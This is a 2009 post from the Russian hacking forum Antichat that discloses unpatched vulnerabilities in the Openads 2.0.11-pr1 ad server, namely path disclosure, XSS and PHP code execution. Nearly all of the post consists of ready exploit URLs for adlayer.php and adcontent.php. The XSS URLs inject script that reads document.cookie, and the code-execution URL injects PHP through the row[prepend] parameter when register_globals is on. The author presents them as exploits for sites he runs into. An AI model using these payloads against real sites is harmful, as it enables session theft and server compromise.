20.09.2009, 01:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами:
9521666
Репутация:
1695
|
|
Уязвимости Openads 2.0.11-pr1
Это последняя версия движка в ветке OpenX 2.0.
Частенько сталкиваюсь с ним на сайтах, в инете уязвимостей по нему не видел...
>> Раскрытие пути:
условия:
+ display_errors = On
сплоит: http://openads/adlayer.php?layerstyle=antichat
>> XSS
условия:
+ register_globals = On
сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<script>alert(document.cookie)</script>
http://openads/adcontent.php?bannerid=id&row[append]=<script>alert(document.cookie)</script>
id - номер существующего баннера
>> Выполнение php кода
условия:
+ $phpAds_config['type_html_php'] = true; // default false
+ наличие html баннера
+ register_globals = On
сплоит: http://openads/adcontent.php?bannerid=id&row[prepend]=<?php phpinfo();?>
id - номер существующего html баннера
|
|
|